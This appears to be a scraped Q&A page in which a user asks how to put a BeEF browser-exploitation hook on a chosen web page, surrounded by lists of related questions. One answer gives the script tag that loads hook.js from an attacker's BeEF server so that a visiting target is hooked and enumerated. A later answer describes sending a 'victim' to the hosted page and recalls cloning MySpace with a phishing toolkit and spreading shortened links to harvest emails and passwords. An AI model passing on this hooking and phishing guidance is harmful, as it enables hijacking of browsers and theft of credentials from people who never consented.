I need to know how to set a BeEF hook to a page of my liking(an existing web page or a new custom page). I tried sharing the demo page but only works on the hosting machine only. I've looked for tutorials but couldn't find any. Please help!
How to set a BeEF hook to a page
2.6k Views Asked by Sathika Hettiarachchi At
2
There are 2 best solutions below
0
elefanxp
On
Using beef-xss you can generate hook.js. Supposing that the target navigates the web page target.html, you shall include in that page:
<script src="http://<beef-xss-ip-address>:<beef-xss-port>/hook.js"></script>
Once your target will load target.html it will be hooked by beef-xss tool and you will be able to enumerate it.
Related Questions in LINUX
- Is there some way to use printf to print a horizontal list of decrementing hex digits in NASM assembly on Linux
- Why does Hugo generate different taxonomy-related HTML on different OS's?
- Writes in io_uring do not advance the file offset
- Why `set -o pipefail` gives different output even though the pipe is not failing
- what really controls the permissions: UID or eUID?
- Compiling eBPF program in Docker fails due to missing '__u64' type
- Docker container unable to make HTTPS requests to external API
- Whow to use callback_query_handler in Python 3.10
- Create kea runtime directory at startup in Yocto image
- Problem on CPU scheduling algorithms in OS
- How to copy files into the singularity sandbox?
- Android kernel error: undefined reference to `get_hw_version_platform'
- Is there a need for BPF Linux namespace?
- Error when trying to execute a binary compiled in a Kali Linux machine on an Ubuntu system
- Issue with launching application after updating ElectronJs to version 28.0.0 on Windows and Linux
Related Questions in XSS
- How to sanitise request body in spring boot if some attributes contain these values
- Using Content Security Policy to prevent XSS with HTML object/data tag
- Checkmarx DOM XSS Vulnerability flagging JS/jQuery code
- Prevent XSS attack on an application made using outsystems, preventing file upload which has hidden javascript code
- How to fix checkmarx reflected XSS attack in JSP page?
- how to prevent url custom parameters xss attack in WordPress
- XSS scan with python and selenium
- i'm trying to sanitize but it doesn't work
- XSS attack on location map
- How to create "unsafe" environment for JavaScript XSS testing
- Is there still an XSS bug in JQuery1.12.4 when I upgrade my JQuery framework from 1.7.2 to 1.12.4?
- Is it safe to store TwitterAPI access tokens in Session variables?
- Sanitize injected CSS to prevent XSS
- Is this POC a real XSS vulnerability?
- How to preserve rich text formatting in contentNote after escaping HTML characters to prevent XSS attack in salesforce
Related Questions in PENETRATION-TESTING
- X-FRAME-OPTIONS header missing on step1.html of Keycloak
- How do I access an iOS app's SQLite database?
- Can Ettercap capture API requests made in Postman?
- Make AWS default security groups limit all inbound and outbound traffic
- How to resolve API Mass Assignment in web method having single parameter?
- Mobile Pen-Testing approach for chatbox functionality
- Struggling with "API - Mass Assignment" Challenge on Root-Me: Seeking Insights
- Issue in installing apk file in rooted device ( INSTALL_PARSE_FAILED_NO_CERTIFICATES )
- filesystem.py is unable to be read even though the file exists and my user has all permissions for the file (sqlmap)
- How to perform Source Code Scanning on a code that is using RSA Key Container
- Python request.get function returning 404 on all directories even valid ones
- Anti debugging protection for React Native App
- SQLMAP - POST parameter 'password' does not seem to be injectable
- Laravel warning on penetration with owasp zap
- Is there any way to run the React Native app on Android while making android:exported as "false" in AndroidManifest.xml file without an error?
Related Questions in PENETRATION-TOOLS
- Mobile Pen-Testing approach for chatbox functionality
- SQLMAP - POST parameter 'password' does not seem to be injectable
- How to upload the update-request.txt file in mend for SCA scan
- How to delete PentextBox with Metasploit 2.3.exe
- Make HTTP requests with not matching Content-Length and body length for testing purposes
- Burp proxy not intercepting modified apk requests
- Sudomy doesn't see api keys
- Trying to exploit SQL injection
- Burp Suite Logger++ Extension Show Only in-Scope items
- Why I have 403 error ONLY when I am using BurpSuite?
- SQLMap not matching string in response
- How to set a BeEF hook to a page
- How do I filter/fix nmap NSE http-enum?
- Cannot import ctypes for checking admin privileges on Windows platform
- On-prem to cloud vulnerability scanning
Related Questions in BEEF
- how to fix more than 3 tunnels are running over a single NGROK agent session
- How to set a BeEF hook to a page
- Beef installation package 'libgcc-9-dev' has no installation candidate, Unable to locate package gcc-9-base
- Beef installation 'libgcc-9-dev' not available. What do i do about it?
- Shrinking a dirty rect
- Window Creation in Beef Language
- Avoid memory leak from creating temporary objects
- How do I sort dictionary keys by value?
- How do I sort a List given an ordering method or lambda?
- How do I write a unit test that should fail?
- What does [&] mean when defining a lambda?
- What does the "cascading member access" operator (..) do?
- How do I shuffle a list?
- How can I prevent objects created in a loop from being released at the end of that iteration of the loop
- How can I use an extension to add interface conformance to a type that is outside my control?
Trending Questions
- UIImageView Frame Doesn't Reflect Constraints
- Is it possible to use adb commands to click on a view by finding its ID?
- How to create a new web character symbol recognizable by html/javascript?
- Why isn't my CSS3 animation smooth in Google Chrome (but very smooth on other browsers)?
- Heap Gives Page Fault
- Connect ffmpeg to Visual Studio 2008
- Both Object- and ValueAnimator jumps when Duration is set above API LvL 24
- How to avoid default initialization of objects in std::vector?
- second argument of the command line arguments in a format other than char** argv or char* argv[]
- How to improve efficiency of algorithm which generates next lexicographic permutation?
- Navigating to the another actvity app getting crash in android
- How to read the particular message format in android and store in sqlite database?
- Resetting inventory status after order is cancelled
- Efficiently compute powers of X in SSE/AVX
- Insert into an external database using ajax and php : POST 500 (Internal Server Error)
Popular Questions
- How do I undo the most recent local commits in Git?
- How can I remove a specific item from an array in JavaScript?
- How do I delete a Git branch locally and remotely?
- Find all files containing a specific text (string) on Linux?
- How do I revert a Git repository to a previous commit?
- How do I create an HTML button that acts like a link?
- How do I check out a remote Git branch?
- How do I force "git pull" to overwrite local files?
- How do I list all files of a directory?
- How to check whether a string contains a substring in JavaScript?
- How do I redirect to another webpage?
- How can I iterate over rows in a Pandas DataFrame?
- How do I convert a String to an int in Java?
- Does Python have a string 'contains' substring method?
- How do I check if a string contains a specific word?
I'm pretty sure You have to host the hook.html file on a hosting service Then direct the victim there. also need to edit the yml file. I remember back in the myspace days you could get on backtrack_r3, Load up setoolset and clone myspace.
Then you uploaded that file on a file host service. Make a stupid post with that link in a link shortener. Then tada you had emails and passwords.